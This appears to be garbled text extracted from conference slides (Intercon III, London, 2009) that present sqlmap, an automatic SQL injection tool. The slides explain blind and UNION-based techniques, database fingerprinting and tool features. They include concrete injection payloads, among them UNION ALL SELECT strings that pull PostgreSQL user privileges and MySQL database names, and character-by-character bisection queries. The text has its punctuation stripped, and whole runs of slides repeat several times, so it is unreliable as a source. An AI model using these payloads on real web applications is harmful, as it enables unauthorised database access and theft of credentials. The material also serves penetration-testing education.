Banner parsing
SQL dialect
Specific functions static output comparison
On a default installation all of them are reliable
On a hardened installation the last two are reliable
DBMS fingerprint (24)
Intercon III London ndash January 9 2009 31
Example of basic back-end DBMS fingerprint on PostgreSQL 83
The techniques in use are two
The two SQL queries injected to identify it are
AND integerint=integer
SQL dialect
AND COALESCE(integer NULL)=integer
Specific function static output comparison
DBMS fingerprint (34)
Intercon III London ndash January 9 2009 32
Example of extensive back-end DBMS fingerprint on Microsoft SQL Server 2005
The techniques in use are three
The result is
active fingerprint Microsoft SQL Server 2005banner parsing fingerprint Microsoft SQL Server 2005 Service Pack 0 version 9001399html error message fingerprint Microsoft SQL Server
Active fingerprint refers to SQL dialect and specific functions static output comparison
DBMS fingerprint (44)
Intercon III London ndash January 9 2009 33
Fingerprinting is a key step in penetration testing
It is not only about back-end DBMS software
There are techniques and tools to fingerprint the web server the web application technology and their underlying system
What about the back-end DBMS underlying system
sqlmap can fingerprint them without making extra requests
Webapplication server and web application technology by parsing the HTTP response headers (Server X-AspNet-Version X-Powered-By etc) ndash known technique
Back-end DBMS operating system by parsing the DBMS banner ndash over-looked technique
More on fingerprint
Intercon III London ndash January 9 2009 34
Second demo
A demo as in demolish or demonstrationCyclops X-Men Evolution
Intercon III London ndash January 9 2009 35
It might comes in handy sometimes to be able to run your own SQL queries mainly for file system read and write access and operating system command execution
The tool inspects the provided statement
If it is a SELECT statement sqlmap uses depending on users options the inferential blind or the UNION query technique to retrieve its output
If it is a data manipulation statement a transaction statement or any other valid SQL statement it uses stacked queries to run it if the web application supports them
Give me a SQL shell
Intercon III London ndash January 9 2009 36
Automation vs granularity (12)sqlmap has been developed to make it simple for a busy penetration tester to detect and exploit SQL injection vulnerabilities in web applications
Providing it with a source of targets it can automatically
Detect all possible SQL injections and confirm them
Identify the SQL query syntax
Fingerprint the back-end DBMS
The user does not have to look on the Net for DBMS specific queries then manually inject them to enumerate users password hashes check if the session user is a DBA enumerate table columns datatype etc
There is an option to dump the whole back-end DBMS
Intercon III London ndash January 9 2009 37
Automation vs granularity (22) The tester is a professional he knows what he does and why
There are options to specify
How to compare True and False HTTP responses
A single or more testable parameters
The SQL payload prefix and postfix
A single or a range of entries to dump from a table
A single or multiple columns to dump from a table
Custom SQL statements to run
Options can be specified from both command line andor configuration file
Options are documented in the users manual with examples
Intercon III London ndash January 9 2009 38
Third demo
I get tons of uninteresting mail and system announcements about babies born etc At least a
demo MIGHT have been interestingRichard Stallman
Intercon III London ndash January 9 2009 39
LimitationsCan sqlmap fail to detect or to exploit a SQL injection vulnerability
Yes in some cases mainly because it does not support
SQL injection on SQL clauses other than WHERE
Time based blind SQL injection technique
but I am working on these and others
Intercon III London ndash January 9 2009 40
Want to contributeI am always looking forward to code contributions
Try it find bugs send feature requests review the code and the documentation contribute on the mailing lists
I can provide you with
Details on code internals
Write access to the Subversion repository
Access to the development platform
A beer if you are in London area
Intercon III London ndash January 9 2009 41
Links and contactsHomepage httpsqlmapsourceforgenet
Documentation
httpsqlmapsourceforgenetdevindexhtml
httpsqlmapsourceforgenetdocREADMEpdf
Mailing lists
httpslistssourceforgenetlistslistinfosqlmap-users
httpslistssourceforgenetlistslistinfosqlmap-devel
Personal contacts
E-mail Jabber bernardodamelegmailcom
Blog httpbernardodameleblogspotcom
Intercon III London ndash January 9 2009 42
References OWASP Testing Guide Open Web Application Security Project
Exploit of a Mom xkcd
Deep Blind SQL Injection Ferruh Mavituna (Portcullis Computer Security Ltd)
Microsoft SQL Server sp_replwritetovarbin limited memory overwrite vulnerability Bernhard Mueller (SEC Consult Vulnerability Lab)
Metasploit Framework H D Moore and the Metasploit development team
w3af Andres Riancho and the w3af development team
Data-mining with SQL Injection and Inference David Litchfield (NGS Software)
Advanced SQL Injection Victor Chapela (Sm4rt Security Services)
Python difflib Python Software Foundation
NULL (SQL) Wikipedia
Agent oriented SQL abuse Fernando Russ and Diego Tiscornia (CORE Security)
Insight on UNION query SQL injection Bernardo Damele A G
DBMS Fingerprint Daniele Bellucci (OWASP Backend Security Project)
Intercon III London ndash January 9 2009 43
Questions
Thanks for your attention
- First
- About me
- SQL what (12)
- SQL what (22)
- State of art
- How does it work
- sqlmap
- sqlmap features (12)
- sqlmap features (22)
- Real world
- Dealing with advertisements (13)
- Dealing with advertisements (23)
- Dealing with advertisements (33)
- To NULL or not to NULL (14)
- To NULL or not to NULL (24)
- To NULL or not to NULL (34)
- To NULL or not to NULL (44)
- SQL payload (13)
- SQL payload (23)
- SQL payload (33)
- First demo
- Bypass columns limitation (14)
- Bypass columns limitation (24)
- Bypass columns limitation (34)
- Bypass columns limitation (44)
- Going partial UNION (13)
- Going partial UNION (23)
- Going partial UNION (33)
- DBMS fingerprint (14)
- DBMS fingerprint (24)
- DBMS fingerprint (34)
- DBMS fingerprint (44)
- More on fingerprint
- Second demo
- Give me a SQL shell
- Automation vs granularity (12)
- Automation vs granularity (22)
- Third demo
- Limitations
- Want to contribute
- Links and contacts
- References
- Questions
-
Intercon III London ndash January 9 2009 6
Basically the steps to go through are
Detection of a possible SQL injection flaw
SQL query syntax detection
Back-end database management system fingerprint
Depending on the session user privileges back-end DBMS and some possible security settings in place server-side a SQL injection issue leads on the DBMS server to
DBMS data unauthorized access
File system read and write access
Operating system command execution
How does it work
Intercon III London ndash January 9 2009 7
sqlmap is an automatic SQL injection tool
Developed in Python Started on July 2006 initially by Daniele Bellucci then I took over in December 2006
Licensed under the terms of GPLv2
Detects and take advantage of SQL injection vulnerabilities in web applications The user can choose to
Perform an extensive back-end DBMS fingerprint
Enumerate users password hashes privileges databases tables columns and their datatypes
Dump entire or users specified database tables entries
Run custom SQL statements and more
sqlmap
Intercon III London ndash January 9 2009 8
sqlmap key features
Full support for MySQL Oracle PostgreSQL and Microsoft SQL Server back-end DBMS software
Full support for three SQL injection techniques
Inferential blind SQL injection
UNION query SQL injection
Stacked queries (multiple statements) support
Target aquisition from user by parsing WebScarabBurp proxies requests log files by Google dorking
Tests for injection flaws on GET and POST parameters HTTP User-Agent header and Cookie values
sqlmap features (12)
Intercon III London ndash January 9 2009 9
More features
Silent to verbose output messages
Granularity in the users options
Support for concurrent HTTP requests (multi-threading)
Estimated time of arrival
Session save and resume
Options from command line andor configuration file
Integration with Metasploit and w3af
File system read and write access and operating system command execution by providing own queries depending on the session user privileges and back-end DBMS
sqlmap features (22)
Intercon III London ndash January 9 2009 10
Real world
Have you ever had a dream Neo that you were so sure was real What if you were unable to wake from
that dream How would you know the difference between the dream world and the real world
Morpheus The Matrix
Intercon III London ndash January 9 2009 11
In the real world web applications are often complex
Usually the page content changes at each refresh
They have inline counters advertisement banner clocks etc
Inferential blind SQL injection algorithm is based on the concept that the HTTP responses differ depending on the SQL query
Dealing with advertisements (13)
Intercon III London ndash January 9 2009 12
Obstacle
If the page content does not depend only on the SQL statement and changes at each refresh then the algorithm may not work
Dealing with advertisements (23)
Intercon III London ndash January 9 2009 13
Python library helped to solve this problem for each HTTP response sqlmap calls a function that compares the returned page content with the untouched original page content
Return a measure of the page contents similarity as a float in the range [0 1] with a radio of 3
It works also when the original page is stable but the injected query with a valid condition (True) differs
If the automatic comparison fails the user can provide a string or a regular expression to match on both original and True page contents and to not match on False page contents
Dealing with advertisements (33)
Intercon III London ndash January 9 2009 14
In standard SQL language NULL is allowed as a value for a table column field
In the inferential blind SQL injection technique usually a bisection algorithm is used to identify if the ordinal value of the Nth query output character is higher of a certain ASCII table number this causes the page content to be True or False
The SQL statement used by sqlmap depending on the back-end DBMS is similar to
ASCII(SUBSTR((SQL query) Nth SQL query output char 1)) gt Bisection algorithm number
To NULL or not to NULL (14)
Intercon III London ndash January 9 2009 15
Obstacle
On some DBMS the substring function can not be used on NULL
To NULL or not to NULL (24)
Intercon III London ndash January 9 2009 16
A possible solution for this problem consists in modifying all SQL querys columns explicitly
Casting its output to be a string
Returning value (space) if the casted value is still NULL
Example on MySQL 50 The SQL query to enumerate the column name first entry is
SELECT name FROM testusers LIMIT 0 1
Casted SQL query
SELECT IFNULL(CAST(name AS CHAR(10000)) CHAR(32)) FROM testusers LIMIT 0 1
To NULL or not to NULL (34)
Intercon III London ndash January 9 2009 17
The inferential blind SQL injected statement will be then
ORD(MID((SELECT IFNULL(CAST(name AS CHAR(10000)) CHAR(32)) FROM testusers LIMIT 0 1) Nth SQL query output character 1)) gt Bisection algorithm number
URL encoded
ORD28MID2828SELECT20IFNULL28CAST28name20AS20CHAR281000029292C20CHAR2832292920FROM20testusers20LIMIT2002C201292C2012C2012929203E2063
To NULL or not to NULL (44)
Intercon III London ndash January 9 2009 18
You have got an injection point
The injection point is in a SQL statement as follows
SELECT FROM users WHERE id LIKE ((( $_GET[id] ))) LIMIT 0 1
SQL payload (13)
Intercon III London ndash January 9 2009 19
Obstacle
The injection is after a LIKE clause within three parenthesis the statement terminates with a LIMIT clause
SQL payload (23)
Intercon III London ndash January 9 2009 20
In this example the SQL payload that sqlmap identifies is
id=1))) AND (((RaNd LIKE RaNd
In the inferential blind SQL injection algorithm will be
id=1))) AND ORD(MID((SQL query) Nth SQL query output character 1)) gt Bisection algorithm number AND (((RaNd LIKE RaNd
In the UNION query SQL injection technique will be
id=1))) UNION ALL SELECT NULL Concatenated SQL query NULL AND (((RaNd LIKE RaNd
SQL payload (33)
Intercon III London ndash January 9 2009 21
First demo
I did every demo possible to see if the things would do what they were promising they would do
Doug Hall
Intercon III London ndash January 9 2009 22
You have got an injection point
It is vulnerable to UNION query SQL injection
sqlmap detected it for you by NULL bruteforcing or by ORDER BY clause bruteforcing depending on your options
Bypass columns limitation (14)
Intercon III London ndash January 9 2009 23
Obstacle
The number of columns in the web application SELECT statement is lower than the number of columns of your UNION ALL SELECT statement
Bypass columns limitation (24)
Intercon III London ndash January 9 2009 24
A possible solution consists in concatenating your SELECT statement columns in a single output by using the specific DBMS string concatenation operator or function
Example on PostgreSQL 83 to retrieve users privileges
The SQL query to inject is
SELECT usename usecreatedb usesuper usecatupd FROM pg_user
Bypass columns limitation (34)
Intercon III London ndash January 9 2009 25
The injection will be
UNION ALL SELECT NULL CHR(83)||CHR(114)||CHR(108)||CHR(71)||CHR(86)||CHR(116)||COALESCE(CAST(usename AS CHARACTER(10000)) CHR(32))||CHR(104)||CHR(100)||CHR(122)||CHR(81)||CHR(121)||CHR(90)||COALESCE(CAST(usecreatedb AS CHARACTER(10000)) CHR(32))||CHR(104)||CHR(100)||CHR(122)||CHR(81)||CHR(121)||CHR(90)||COALESCE(CAST(usesuper AS CHARACTER(10000)) CHR(32))||CHR(104)||CHR(100)||CHR(122)||CHR(81)||CHR(121)||CHR(90)||COALESCE(CAST(usecatupd AS CHARACTER(10000)) CHR(32))||CHR(75)||CHR(121)||CHR(80)||CHR(65)||CHR(68)||CHR(102) NULL FROM pg_usershyshy
Bypass columns limitation (44)
Intercon III London ndash January 9 2009 26
Obstacle
You have got an injection point vulnerable to UNION query SQL injection Only the query outputs first entry or a range of entries is displayed in the page content
Going partial UNION (13)
Intercon III London ndash January 9 2009 27
sqlmap automatizes a known technique
Changes the parameter value to its negative value causing the original query to produce no output
Inspects and unpack the provided SQL statement
Calculates its output number of entries
Limits it after the UNION ALL SELECT to return one entry at a time
Repeat the previous action N times where N is equal to the number of entries
Going partial UNION (23)
Intercon III London ndash January 9 2009 28
Example on MySQL 41 to enumerate list of databases
The SQL query to inject is
SELECT db FROM mysqldb
sqlmap identified the injection point as being an non-quoted parameter (integer) in the WHERE clause with the equal operator (simple scenario)
The injection will be
id=shy1 UNION ALL SELECT NULL CONCAT(CHAR(1008471698798)IFNULL(CAST(db AS CHAR(10000)) CHAR(32)) CHAR(65831188187116)) NULL FROM mysqldb LIMIT 0 1 AND 6972=6972
Going partial UNION (33)
Intercon III London ndash January 9 2009 29
Back-end DBMS fingerprinting is a mandatory step to go through to take full advantage of a SQL injection flaw
There are a few well known techniques and a few over-looked techniques
sqlmap implements up to four techniques three of these are in use by other tools
The user can force the back-end DBMS software value no HTTP requests are sent to identify the software
By default a basic DBMS fingerprint based on one or two techniques is done only two HTTP requests are sent
The user can choose to perform an extensive DBMS fingerprint based on four techniques numerous (30+) HTTP requests are sent
DBMS fingerprint (14)
Intercon III London ndash January 9 2009 30
The techniques implemented to perform an extensive back-end DBMS fingerprint are
Inband error messages
Banner parsing
SQL dialect
Specific functions static output comparison
On a default installation all of them are reliable
On a hardened installation the last two are reliable
DBMS fingerprint (24)
Intercon III London ndash January 9 2009 31
Example of basic back-end DBMS fingerprint on PostgreSQL 83
The techniques in use are two
The two SQL queries injected to identify it are
AND integerint=integer
SQL dialect
AND COALESCE(integer NULL)=integer
Specific function static output comparison
DBMS fingerprint (34)
Intercon III London ndash January 9 2009 32
Example of extensive back-end DBMS fingerprint on Microsoft SQL Server 2005
The techniques in use are three
The result is
active fingerprint Microsoft SQL Server 2005banner parsing fingerprint Microsoft SQL Server 2005 Service Pack 0 version 9001399html error message fingerprint Microsoft SQL Server
Active fingerprint refers to SQL dialect and specific functions static output comparison
DBMS fingerprint (44)
Intercon III London ndash January 9 2009 33
Fingerprinting is a key step in penetration testing
It is not only about back-end DBMS software
There are techniques and tools to fingerprint the web server the web application technology and their underlying system
What about the back-end DBMS underlying system
sqlmap can fingerprint them without making extra requests
Webapplication server and web application technology by parsing the HTTP response headers (Server X-AspNet-Version X-Powered-By etc) ndash known technique
Back-end DBMS operating system by parsing the DBMS banner ndash over-looked technique
More on fingerprint
Intercon III London ndash January 9 2009 34
Second demo
A demo as in demolish or demonstrationCyclops X-Men Evolution
Intercon III London ndash January 9 2009 35
It might comes in handy sometimes to be able to run your own SQL queries mainly for file system read and write access and operating system command execution
The tool inspects the provided statement
If it is a SELECT statement sqlmap uses depending on users options the inferential blind or the UNION query technique to retrieve its output
If it is a data manipulation statement a transaction statement or any other valid SQL statement it uses stacked queries to run it if the web application supports them
Give me a SQL shell
Intercon III London ndash January 9 2009 36
Automation vs granularity (12)sqlmap has been developed to make it simple for a busy penetration tester to detect and exploit SQL injection vulnerabilities in web applications
Providing it with a source of targets it can automatically
Detect all possible SQL injections and confirm them
Identify the SQL query syntax
Fingerprint the back-end DBMS
The user does not have to look on the Net for DBMS specific queries then manually inject them to enumerate users password hashes check if the session user is a DBA enumerate table columns datatype etc
There is an option to dump the whole back-end DBMS
Intercon III London ndash January 9 2009 37
Automation vs granularity (22) The tester is a professional he knows what he does and why
There are options to specify
How to compare True and False HTTP responses
A single or more testable parameters
The SQL payload prefix and postfix
A single or a range of entries to dump from a table
A single or multiple columns to dump from a table
Custom SQL statements to run
Options can be specified from both command line andor configuration file
Options are documented in the users manual with examples
Intercon III London ndash January 9 2009 38
Third demo
I get tons of uninteresting mail and system announcements about babies born etc At least a
demo MIGHT have been interestingRichard Stallman
Intercon III London ndash January 9 2009 39
LimitationsCan sqlmap fail to detect or to exploit a SQL injection vulnerability
Yes in some cases mainly because it does not support
SQL injection on SQL clauses other than WHERE
Time based blind SQL injection technique
but I am working on these and others
Intercon III London ndash January 9 2009 40
Want to contributeI am always looking forward to code contributions
Try it find bugs send feature requests review the code and the documentation contribute on the mailing lists
I can provide you with
Details on code internals
Write access to the Subversion repository
Access to the development platform
A beer if you are in London area
Intercon III London ndash January 9 2009 41
Links and contactsHomepage httpsqlmapsourceforgenet
Documentation
httpsqlmapsourceforgenetdevindexhtml
httpsqlmapsourceforgenetdocREADMEpdf
Mailing lists
httpslistssourceforgenetlistslistinfosqlmap-users
httpslistssourceforgenetlistslistinfosqlmap-devel
Personal contacts
E-mail Jabber bernardodamelegmailcom
Blog httpbernardodameleblogspotcom
Intercon III London ndash January 9 2009 42
References OWASP Testing Guide Open Web Application Security Project
Exploit of a Mom xkcd
Deep Blind SQL Injection Ferruh Mavituna (Portcullis Computer Security Ltd)
Microsoft SQL Server sp_replwritetovarbin limited memory overwrite vulnerability Bernhard Mueller (SEC Consult Vulnerability Lab)
Metasploit Framework H D Moore and the Metasploit development team
w3af Andres Riancho and the w3af development team
Data-mining with SQL Injection and Inference David Litchfield (NGS Software)
Advanced SQL Injection Victor Chapela (Sm4rt Security Services)
Python difflib Python Software Foundation
NULL (SQL) Wikipedia
Agent oriented SQL abuse Fernando Russ and Diego Tiscornia (CORE Security)
Insight on UNION query SQL injection Bernardo Damele A G
DBMS Fingerprint Daniele Bellucci (OWASP Backend Security Project)
Intercon III London ndash January 9 2009 43
Questions
Thanks for your attention
- First
- About me
- SQL what (12)
- SQL what (22)
- State of art
- How does it work
- sqlmap
- sqlmap features (12)
- sqlmap features (22)
- Real world
- Dealing with advertisements (13)
- Dealing with advertisements (23)
- Dealing with advertisements (33)
- To NULL or not to NULL (14)
- To NULL or not to NULL (24)
- To NULL or not to NULL (34)
- To NULL or not to NULL (44)
- SQL payload (13)
- SQL payload (23)
- SQL payload (33)
- First demo
- Bypass columns limitation (14)
- Bypass columns limitation (24)
- Bypass columns limitation (34)
- Bypass columns limitation (44)
- Going partial UNION (13)
- Going partial UNION (23)
- Going partial UNION (33)
- DBMS fingerprint (14)
- DBMS fingerprint (24)
- DBMS fingerprint (34)
- DBMS fingerprint (44)
- More on fingerprint
- Second demo
- Give me a SQL shell
- Automation vs granularity (12)
- Automation vs granularity (22)
- Third demo
- Limitations
- Want to contribute
- Links and contacts
- References
- Questions
-
Intercon III London ndash January 9 2009 7
sqlmap is an automatic SQL injection tool
Developed in Python Started on July 2006 initially by Daniele Bellucci then I took over in December 2006
Licensed under the terms of GPLv2
Detects and take advantage of SQL injection vulnerabilities in web applications The user can choose to
Perform an extensive back-end DBMS fingerprint
Enumerate users password hashes privileges databases tables columns and their datatypes
Dump entire or users specified database tables entries
Run custom SQL statements and more
sqlmap
Intercon III London ndash January 9 2009 8
sqlmap key features
Full support for MySQL Oracle PostgreSQL and Microsoft SQL Server back-end DBMS software
Full support for three SQL injection techniques
Inferential blind SQL injection
UNION query SQL injection
Stacked queries (multiple statements) support
Target aquisition from user by parsing WebScarabBurp proxies requests log files by Google dorking
Tests for injection flaws on GET and POST parameters HTTP User-Agent header and Cookie values
sqlmap features (12)
Intercon III London ndash January 9 2009 9
More features
Silent to verbose output messages
Granularity in the users options
Support for concurrent HTTP requests (multi-threading)
Estimated time of arrival
Session save and resume
Options from command line andor configuration file
Integration with Metasploit and w3af
File system read and write access and operating system command execution by providing own queries depending on the session user privileges and back-end DBMS
sqlmap features (22)
Intercon III London ndash January 9 2009 10
Real world
Have you ever had a dream Neo that you were so sure was real What if you were unable to wake from
that dream How would you know the difference between the dream world and the real world
Morpheus The Matrix
Intercon III London ndash January 9 2009 11
In the real world web applications are often complex
Usually the page content changes at each refresh
They have inline counters advertisement banner clocks etc
Inferential blind SQL injection algorithm is based on the concept that the HTTP responses differ depending on the SQL query
Dealing with advertisements (13)
Intercon III London ndash January 9 2009 12
Obstacle
If the page content does not depend only on the SQL statement and changes at each refresh then the algorithm may not work
Dealing with advertisements (23)
Intercon III London ndash January 9 2009 13
Python library helped to solve this problem for each HTTP response sqlmap calls a function that compares the returned page content with the untouched original page content
Return a measure of the page contents similarity as a float in the range [0 1] with a radio of 3
It works also when the original page is stable but the injected query with a valid condition (True) differs
If the automatic comparison fails the user can provide a string or a regular expression to match on both original and True page contents and to not match on False page contents
Dealing with advertisements (33)
Intercon III London ndash January 9 2009 14
In standard SQL language NULL is allowed as a value for a table column field
In the inferential blind SQL injection technique usually a bisection algorithm is used to identify if the ordinal value of the Nth query output character is higher of a certain ASCII table number this causes the page content to be True or False
The SQL statement used by sqlmap depending on the back-end DBMS is similar to
ASCII(SUBSTR((SQL query) Nth SQL query output char 1)) gt Bisection algorithm number
To NULL or not to NULL (14)
Intercon III London ndash January 9 2009 15
Obstacle
On some DBMS the substring function can not be used on NULL
To NULL or not to NULL (24)
Intercon III London ndash January 9 2009 16
A possible solution for this problem consists in modifying all SQL querys columns explicitly
Casting its output to be a string
Returning value (space) if the casted value is still NULL
Example on MySQL 50 The SQL query to enumerate the column name first entry is
SELECT name FROM testusers LIMIT 0 1
Casted SQL query
SELECT IFNULL(CAST(name AS CHAR(10000)) CHAR(32)) FROM testusers LIMIT 0 1
To NULL or not to NULL (34)
Intercon III London ndash January 9 2009 17
The inferential blind SQL injected statement will be then
ORD(MID((SELECT IFNULL(CAST(name AS CHAR(10000)) CHAR(32)) FROM testusers LIMIT 0 1) Nth SQL query output character 1)) gt Bisection algorithm number
URL encoded
ORD28MID2828SELECT20IFNULL28CAST28name20AS20CHAR281000029292C20CHAR2832292920FROM20testusers20LIMIT2002C201292C2012C2012929203E2063
To NULL or not to NULL (44)
Intercon III London ndash January 9 2009 18
You have got an injection point
The injection point is in a SQL statement as follows
SELECT FROM users WHERE id LIKE ((( $_GET[id] ))) LIMIT 0 1
SQL payload (13)
Intercon III London ndash January 9 2009 19
Obstacle
The injection is after a LIKE clause within three parenthesis the statement terminates with a LIMIT clause
SQL payload (23)
Intercon III London ndash January 9 2009 20
In this example the SQL payload that sqlmap identifies is
id=1))) AND (((RaNd LIKE RaNd
In the inferential blind SQL injection algorithm will be
id=1))) AND ORD(MID((SQL query) Nth SQL query output character 1)) gt Bisection algorithm number AND (((RaNd LIKE RaNd
In the UNION query SQL injection technique will be
id=1))) UNION ALL SELECT NULL Concatenated SQL query NULL AND (((RaNd LIKE RaNd
SQL payload (33)
Intercon III London ndash January 9 2009 21
First demo
I did every demo possible to see if the things would do what they were promising they would do
Doug Hall
Intercon III London ndash January 9 2009 22
You have got an injection point
It is vulnerable to UNION query SQL injection
sqlmap detected it for you by NULL bruteforcing or by ORDER BY clause bruteforcing depending on your options
Bypass columns limitation (14)
Intercon III London ndash January 9 2009 23
Obstacle
The number of columns in the web application SELECT statement is lower than the number of columns of your UNION ALL SELECT statement
Bypass columns limitation (24)
Intercon III London ndash January 9 2009 24
A possible solution consists in concatenating your SELECT statement columns in a single output by using the specific DBMS string concatenation operator or function
Example on PostgreSQL 83 to retrieve users privileges
The SQL query to inject is
SELECT usename usecreatedb usesuper usecatupd FROM pg_user
Bypass columns limitation (34)
Intercon III London ndash January 9 2009 25
The injection will be
UNION ALL SELECT NULL CHR(83)||CHR(114)||CHR(108)||CHR(71)||CHR(86)||CHR(116)||COALESCE(CAST(usename AS CHARACTER(10000)) CHR(32))||CHR(104)||CHR(100)||CHR(122)||CHR(81)||CHR(121)||CHR(90)||COALESCE(CAST(usecreatedb AS CHARACTER(10000)) CHR(32))||CHR(104)||CHR(100)||CHR(122)||CHR(81)||CHR(121)||CHR(90)||COALESCE(CAST(usesuper AS CHARACTER(10000)) CHR(32))||CHR(104)||CHR(100)||CHR(122)||CHR(81)||CHR(121)||CHR(90)||COALESCE(CAST(usecatupd AS CHARACTER(10000)) CHR(32))||CHR(75)||CHR(121)||CHR(80)||CHR(65)||CHR(68)||CHR(102) NULL FROM pg_usershyshy
Bypass columns limitation (44)
Intercon III London ndash January 9 2009 26
Obstacle
You have got an injection point vulnerable to UNION query SQL injection Only the query outputs first entry or a range of entries is displayed in the page content
Going partial UNION (13)
Intercon III London ndash January 9 2009 27
sqlmap automatizes a known technique
Changes the parameter value to its negative value causing the original query to produce no output
Inspects and unpack the provided SQL statement
Calculates its output number of entries
Limits it after the UNION ALL SELECT to return one entry at a time
Repeat the previous action N times where N is equal to the number of entries
Going partial UNION (23)
Intercon III London ndash January 9 2009 28
Example on MySQL 41 to enumerate list of databases
The SQL query to inject is
SELECT db FROM mysqldb
sqlmap identified the injection point as being an non-quoted parameter (integer) in the WHERE clause with the equal operator (simple scenario)
The injection will be
id=shy1 UNION ALL SELECT NULL CONCAT(CHAR(1008471698798)IFNULL(CAST(db AS CHAR(10000)) CHAR(32)) CHAR(65831188187116)) NULL FROM mysqldb LIMIT 0 1 AND 6972=6972
Going partial UNION (33)
Intercon III London ndash January 9 2009 29
Back-end DBMS fingerprinting is a mandatory step to go through to take full advantage of a SQL injection flaw
There are a few well known techniques and a few over-looked techniques
sqlmap implements up to four techniques three of these are in use by other tools
The user can force the back-end DBMS software value no HTTP requests are sent to identify the software
By default a basic DBMS fingerprint based on one or two techniques is done only two HTTP requests are sent
The user can choose to perform an extensive DBMS fingerprint based on four techniques numerous (30+) HTTP requests are sent
DBMS fingerprint (14)
Intercon III London ndash January 9 2009 30
The techniques implemented to perform an extensive back-end DBMS fingerprint are
Inband error messages
Banner parsing
SQL dialect
Specific functions static output comparison
On a default installation all of them are reliable
On a hardened installation the last two are reliable
DBMS fingerprint (24)
Intercon III London ndash January 9 2009 31
Example of basic back-end DBMS fingerprint on PostgreSQL 83
The techniques in use are two
The two SQL queries injected to identify it are
AND integerint=integer
SQL dialect
AND COALESCE(integer NULL)=integer
Specific function static output comparison
DBMS fingerprint (34)
Intercon III London ndash January 9 2009 32
Example of extensive back-end DBMS fingerprint on Microsoft SQL Server 2005
The techniques in use are three
The result is
active fingerprint Microsoft SQL Server 2005banner parsing fingerprint Microsoft SQL Server 2005 Service Pack 0 version 9001399html error message fingerprint Microsoft SQL Server
Active fingerprint refers to SQL dialect and specific functions static output comparison
DBMS fingerprint (44)
Intercon III London ndash January 9 2009 33
Fingerprinting is a key step in penetration testing
It is not only about back-end DBMS software
There are techniques and tools to fingerprint the web server the web application technology and their underlying system
What about the back-end DBMS underlying system
sqlmap can fingerprint them without making extra requests
Webapplication server and web application technology by parsing the HTTP response headers (Server X-AspNet-Version X-Powered-By etc) ndash known technique
Back-end DBMS operating system by parsing the DBMS banner ndash over-looked technique
More on fingerprint
Intercon III London ndash January 9 2009 34
Second demo
A demo as in demolish or demonstrationCyclops X-Men Evolution
Intercon III London ndash January 9 2009 35
It might comes in handy sometimes to be able to run your own SQL queries mainly for file system read and write access and operating system command execution
The tool inspects the provided statement
If it is a SELECT statement sqlmap uses depending on users options the inferential blind or the UNION query technique to retrieve its output
If it is a data manipulation statement a transaction statement or any other valid SQL statement it uses stacked queries to run it if the web application supports them
Give me a SQL shell
Intercon III London ndash January 9 2009 36
Automation vs granularity (12)sqlmap has been developed to make it simple for a busy penetration tester to detect and exploit SQL injection vulnerabilities in web applications
Providing it with a source of targets it can automatically
Detect all possible SQL injections and confirm them
Identify the SQL query syntax
Fingerprint the back-end DBMS
The user does not have to look on the Net for DBMS specific queries then manually inject them to enumerate users password hashes check if the session user is a DBA enumerate table columns datatype etc
There is an option to dump the whole back-end DBMS
Intercon III London ndash January 9 2009 37
Automation vs granularity (22) The tester is a professional he knows what he does and why
There are options to specify
How to compare True and False HTTP responses
A single or more testable parameters
The SQL payload prefix and postfix
A single or a range of entries to dump from a table
A single or multiple columns to dump from a table
Custom SQL statements to run
Options can be specified from both command line andor configuration file
Options are documented in the users manual with examples
Intercon III London ndash January 9 2009 38
Third demo
I get tons of uninteresting mail and system announcements about babies born etc At least a
demo MIGHT have been interestingRichard Stallman
Intercon III London ndash January 9 2009 39
LimitationsCan sqlmap fail to detect or to exploit a SQL injection vulnerability
Yes in some cases mainly because it does not support
SQL injection on SQL clauses other than WHERE
Time based blind SQL injection technique
but I am working on these and others
Intercon III London ndash January 9 2009 40
Want to contributeI am always looking forward to code contributions
Try it find bugs send feature requests review the code and the documentation contribute on the mailing lists
I can provide you with
Details on code internals
Write access to the Subversion repository
Access to the development platform
A beer if you are in London area
Intercon III London ndash January 9 2009 41
Links and contactsHomepage httpsqlmapsourceforgenet
Documentation
httpsqlmapsourceforgenetdevindexhtml
httpsqlmapsourceforgenetdocREADMEpdf
Mailing lists
httpslistssourceforgenetlistslistinfosqlmap-users
httpslistssourceforgenetlistslistinfosqlmap-devel
Personal contacts
E-mail Jabber bernardodamelegmailcom
Blog httpbernardodameleblogspotcom
Intercon III London ndash January 9 2009 42
References OWASP Testing Guide Open Web Application Security Project
Exploit of a Mom xkcd
Deep Blind SQL Injection Ferruh Mavituna (Portcullis Computer Security Ltd)
Microsoft SQL Server sp_replwritetovarbin limited memory overwrite vulnerability Bernhard Mueller (SEC Consult Vulnerability Lab)
Metasploit Framework H D Moore and the Metasploit development team
w3af Andres Riancho and the w3af development team
Data-mining with SQL Injection and Inference David Litchfield (NGS Software)
Advanced SQL Injection Victor Chapela (Sm4rt Security Services)
Python difflib Python Software Foundation
NULL (SQL) Wikipedia
Agent oriented SQL abuse Fernando Russ and Diego Tiscornia (CORE Security)
Insight on UNION query SQL injection Bernardo Damele A G
DBMS Fingerprint Daniele Bellucci (OWASP Backend Security Project)
Intercon III London ndash January 9 2009 43
Questions
Thanks for your attention
- First
- About me
- SQL what (12)
- SQL what (22)
- State of art
- How does it work
- sqlmap
- sqlmap features (12)
- sqlmap features (22)
- Real world
- Dealing with advertisements (13)
- Dealing with advertisements (23)
- Dealing with advertisements (33)
- To NULL or not to NULL (14)
- To NULL or not to NULL (24)
- To NULL or not to NULL (34)
- To NULL or not to NULL (44)
- SQL payload (13)
- SQL payload (23)
- SQL payload (33)
- First demo
- Bypass columns limitation (14)
- Bypass columns limitation (24)
- Bypass columns limitation (34)
- Bypass columns limitation (44)
- Going partial UNION (13)
- Going partial UNION (23)
- Going partial UNION (33)
- DBMS fingerprint (14)
- DBMS fingerprint (24)
- DBMS fingerprint (34)
- DBMS fingerprint (44)
- More on fingerprint
- Second demo
- Give me a SQL shell
- Automation vs granularity (12)
- Automation vs granularity (22)
- Third demo
- Limitations
- Want to contribute
- Links and contacts
- References
- Questions
-
Intercon III London ndash January 9 2009 8
sqlmap key features
Full support for MySQL Oracle PostgreSQL and Microsoft SQL Server back-end DBMS software
Full support for three SQL injection techniques
Inferential blind SQL injection
UNION query SQL injection
Stacked queries (multiple statements) support
Target aquisition from user by parsing WebScarabBurp proxies requests log files by Google dorking
Tests for injection flaws on GET and POST parameters HTTP User-Agent header and Cookie values
sqlmap features (12)
Intercon III London ndash January 9 2009 9
More features
Silent to verbose output messages
Granularity in the users options
